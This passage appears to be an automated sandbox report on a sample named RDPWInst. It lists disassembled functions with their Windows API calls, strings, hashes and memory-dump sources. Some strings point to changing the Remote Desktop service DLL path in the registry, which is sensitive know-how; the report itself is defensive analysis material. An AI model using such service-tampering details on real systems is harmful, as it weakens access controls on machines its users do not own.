                                                                                • Opcode Fuzzy Hash: dc7e807bea1f66438189088f752b6e292b8bc82f638beb9f71fc88f2eaf7a259
                                                                                • Instruction Fuzzy Hash: AAC149627046001BE715AE7D9EC936E77899BC5326F18827FE504EB3C5DABCCE468348
                                                                                Function 00408D70 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71stringlibraryloaderCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?), ref: 00408D8D
                                                                                • GetProcAddress.KERNEL32(?,GetLongPathNameW), ref: 00408DA4
                                                                                • lstrcpynW.KERNEL32(?,?,?), ref: 00408DD4
                                                                                • lstrcpynW.KERNEL32(?,?,?,kernel32.dll,?,?,?), ref: 00408E43
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcpyn$AddressHandleModuleProc
                                                                                • String ID: GetLongPathNameW$kernel32.dll
                                                                                • API String ID: 682285877-568771998
                                                                                • Opcode ID: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                                                • Instruction ID: bfed53c75bae09f5f3cffe8e2e1a10a808aab42f40121fe7fe66bb66f29727bd
                                                                                • Opcode Fuzzy Hash: b8455c5fe78c2c884a1c523d091bd77d655f60f97b2ecbe02dba18575876a37c
                                                                                • Instruction Fuzzy Hash: 65213E71D10219EBDB10DBE8CA85A9EB3F9AF04344F14457BA584F72C1EB789E408B99
                                                                                Function 0043C9B4 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 68COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,?,00447324,?,?,00443D51,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043CA09
                                                                                Strings
                                                                                • $sD, xrefs: 0043CA16
                                                                                • ServiceDll, xrefs: 0043CA58
                                                                                • \SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0043C9F8
                                                                                • %SystemRoot%\System32\termsrv.dll, xrefs: 0043CA53
                                                                                • [-] OpenKey error (code , xrefs: 0043CA1B
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: $sD$%SystemRoot%\System32\termsrv.dll$ServiceDll$[-] OpenKey error (code $\SYSTEM\CurrentControlSet\Services\TermService\Parameters
                                                                                • API String ID: 1452528299-1418523706
                                                                                • Opcode ID: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                                                • Instruction ID: 567d776bcdb317a1c07dce30fb64d79162ce412928a02d635409720c7dced6b6
                                                                                • Opcode Fuzzy Hash: d2f311149e027bc2624a0d6677516fc2b3f38769c85f091cbdc9e4c4a7fc29bb
                                                                                • Instruction Fuzzy Hash: 5E1160746042049FD700FBAAED8355AB7A5DB89318F21A07FF504AB652CA396D01972D
                                                                                Function 0043B48C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 52serviceCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4BC
                                                                                • CloseServiceHandle.ADVAPI32(00000000,00000000,0043B52C,?,00000000,?,?,0043B6A3,?,00000000,00000000,?,00000000,00000000,00000010,00000000), ref: 0043B4D1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleService
                                                                                • String ID: error (code $$sD$[-]
                                                                                • API String ID: 1725840886-1845222458
                                                                                • Opcode ID: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                                                • Instruction ID: e4f6fbb8d87d745fddbbf3aa76ef7c2d42e102f771b0e90c1d198fe2bf5ce7b8
                                                                                • Opcode Fuzzy Hash: cf70b5b7ebfe22217b52877715410a6f055c53433fc66062313880689f831c28
                                                                                • Instruction Fuzzy Hash: 411165B4604204AFD700FBA5C946A5EBBE9EF8C309F51807AF504DB652C738AE409A6D
                                                                                Function 0041EFE0 Relevance: 7.8, APIs: 5, Instructions: 334COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                                                • Instruction ID: 2dafaf7b7fd63d2285bbc883fb865dc5d4a09b7d21a303d5748d7aa51e2b097e
                                                                                • Opcode Fuzzy Hash: bd1bd09856875484954c00905d9deca0163cdd4237c815e7c02b6f8489ed4b52
                                                                                • Instruction Fuzzy Hash: 33D18035E042599BCF10DBA9C4818FEB7B9EF49704B5080B7EC51A7251D738AD8BCB29
                                                                                Function 0042E0CC Relevance: 7.6, APIs: 5, Instructions: 142COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E12C
                                                                                • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1D4
                                                                                • CharNextW.USER32(?,?,00000000,0042E26E), ref: 0042E1F9
                                                                                • CharNextW.USER32(00000000,?,?,00000000,0042E26E), ref: 0042E211
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CharNext
                                                                                • String ID:
                                                                                • API String ID: 3213498283-0
                                                                                • Opcode ID: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                                                • Instruction ID: 1814d07402b1a7f57a8d7a3fe8506fdc05c33e5c0032e5bf9772b1ea290cc636
                                                                                • Opcode Fuzzy Hash: 7217fcbca270de98ef8b4b4e8b85cbbd9122b6aa6dc92a8c6271a0bfb5eea1bb
                                                                                • Instruction Fuzzy Hash: D5516D30B00624DFDF15EF6AD890A697BB5EF06304F8100E6E401DB3A5D778AD92CB5A
                                                                                Function 00412EDC Relevance: 7.6, APIs: 5, Instructions: 50threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(?,00000000,00412F73,?,?,00000000), ref: 00412EF4
                                                                                  • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F24
                                                                                • EnumCalendarInfoW.KERNEL32(Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F2F
                                                                                • GetThreadLocale.KERNEL32(00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F4D
                                                                                • EnumCalendarInfoW.KERNEL32(Function_00012E64,00000000,00000000,00000003,Function_00012E28,00000000,00000000,00000004,00000000,00412F73,?,?,00000000), ref: 00412F58
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread$CalendarEnum
                                                                                • String ID:
                                                                                • API String ID: 4102113445-0
                                                                                • Opcode ID: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                                                • Instruction ID: 92d88662b64aaf91616c62fb6041fad244e46e3b41fee23c13374d6d2d88cd2b
                                                                                • Opcode Fuzzy Hash: 55eda0c8fa878099e478bf73f67320f830a82478ca3254b52692bae57d1b1ada
                                                                                • Instruction Fuzzy Hash: 930142713007046BE301A6B1CE13F9A726CEB82718F610437F100F66C1D6BCAE2192AD
                                                                                Function 00412F90 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 177threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(?,00000000,004131C3,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412FCB
                                                                                  • Part of subcall function 00412C4C: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 00412C6A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Locale$InfoThread
                                                                                • String ID: eeee$ggg$yyyy
                                                                                • API String ID: 4232894706-1253427255
                                                                                • Opcode ID: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                                                • Instruction ID: b43ca61d4524358572b11bc7e7a437c5213401559800a2754e6fdc13831cf262
                                                                                • Opcode Fuzzy Hash: f0e1bd095bade663e8df46e19b5da6729160b75494cb6633c971c77849839ccd
                                                                                • Instruction Fuzzy Hash: 97519835B00105ABDB10EF69C8425DEB7B5EF84305B21807BA401E73AADB7CDF92965D
                                                                                Function 00412D02 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocaleThread
                                                                                • String ID: 0\D$`\D$|\D
                                                                                • API String ID: 635194068-1443555069
                                                                                • Opcode ID: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                                                • Instruction ID: 0f9472f532bfb6d97ff063cc401fba787666d5dde08e68930300e7878c0b733c
                                                                                • Opcode Fuzzy Hash: 0cc7b5f362df3f3b22b96f6267770b75cfda245be271edcbb912247af85876fd
                                                                                • Instruction Fuzzy Hash: 0831E871F006086BDB04DA55D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                                                Function 00412D04 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 106threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000000,00412E17,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00412D20
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LocaleThread
                                                                                • String ID: 0\D$`\D$|\D
                                                                                • API String ID: 635194068-1443555069
                                                                                • Opcode ID: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                                                • Instruction ID: e329392f02449b06687ba54e558461cdf4d213220e6431f4601da2913400d418
                                                                                • Opcode Fuzzy Hash: c41b53ad99340a58dd1ea3df1ca7b54c87d2f8ec0189060bbe7d6b41ea99f8a8
                                                                                • Instruction Fuzzy Hash: A631E871F006086BDB04DA45D891BAF73B9DB88314F65803BFA05E7382D67CED5183A8
                                                                                Function 004114A4 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00411595), ref: 0041152C
                                                                                • GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00411595), ref: 00411532
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: DateFormatLocaleThread
                                                                                • String ID: $yyyy
                                                                                • API String ID: 3303714858-404527807
                                                                                • Opcode ID: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                                                • Instruction ID: 4e3523b49621e94f0abc5fe99f3e528012799777c4c12a7b6b737367db96c017
                                                                                • Opcode Fuzzy Hash: 5e56a81e6ec8d75afdc6e5fb3bd2dd6b96c822b9e08f0a8d12efe2345fd405b1
                                                                                • Instruction Fuzzy Hash: 8F219531A00118ABD710EF55C941AEEB3FAEF48300F514077F905E72A1D6389E40C7A9
                                                                                Function 0043C45C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 59COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000200,00000000,0043C52D,?,00447324,?,0043F7DC,00000000,0043FAEE,?,?,?,00447324), ref: 0043C4F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EnvironmentExpandStrings
                                                                                • String ID: $sD$%ProgramFiles%$%ProgramW6432%
                                                                                • API String ID: 237503144-3145546840
                                                                                • Opcode ID: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                                                • Instruction ID: dfc59d650baf98a512f6366ea296a42dbe4730e7440a0cbc8b484aecff229b80
                                                                                • Opcode Fuzzy Hash: c5f063dfebfa4231b205ec39474c4c55e757e18b534536750d11f4516631b0cd
                                                                                • Instruction Fuzzy Hash: 411184B0604168ABD714EB65CD92A9DB7B9DB48304F5140BBA205F3292DB38EE558B1C
                                                                                Function 0040AEAC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindResourceW.KERNEL32(00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEC0
                                                                                • LoadResource.KERNEL32(00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AED7
                                                                                • LockResource.KERNEL32(00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 0040AEE8
                                                                                  • Part of subcall function 00415A68: GetLastError.KERNEL32(0040AEF9,00000000,00400000,00000000,00400000,CHARTABLE,0000000A,?,?,0040ADC8,?,0040EE39,00000000,0040EF55), ref: 00415A68
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$ErrorFindLastLoadLock
                                                                                • String ID: CHARTABLE
                                                                                • API String ID: 1074440638-2668339182
                                                                                • Opcode ID: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
                                                                                • Instruction ID: 0ebed5ed6e5dda7701dd75a560580c35c1b3b1e5272f816bd12d169416f3b400
                                                                                • Opcode Fuzzy Hash: 2576ac7df62392cdd79f5341252eb240a6292d2d2deea21fb17a0e0107b6f450
                                                                                • Instruction Fuzzy Hash: 4E0180B87803018FC718EF59D8D1A9A73E9AB99320709453EE241577A1CF3C9C40DB59
                                                                                Function 00419584 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00419633
                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0041964F
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004196C6
                                                                                • VariantClear.OLEAUT32(?), ref: 004196EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464106397.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464149900.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464265690.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_8_2_400000_RDPWInst.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                • String ID:
                                                                                • API String ID: 920484758-0
                                                                                • Opcode ID: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                                                • Instruction ID: d3a60771d8c98d42dda0da8010ad17e71a6e6e293320ab5b6f42a6f3f22a61d9
                                                                                • Opcode Fuzzy Hash: 0f680bb846408bca051d329f0f9141866d040382b2d86f627a051af50f217def
                                                                                • Instruction Fuzzy Hash: F7410D75A0061D9FCB61DF59CC90BD9B3FCAB48314F0055DAE549A7212DA38AFC18F64
                                                                                Function 0041325C Relevance: 6.1, APIs: 4, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00413408), ref: 0041328F
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 004132B3
                                                                                • GetModuleFileNameW.KERNEL32(00400000,?,00000105), ref: 004132CE
                                                                                • LoadStringW.USER32(00000000,0000FFE5,?,00000100), ref: 00413369
                                                                                Memory Dump Source
                                                                                • Source File: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000008.00000002.1463939516.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                • Associated: 00000008.00000002.1464083615.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
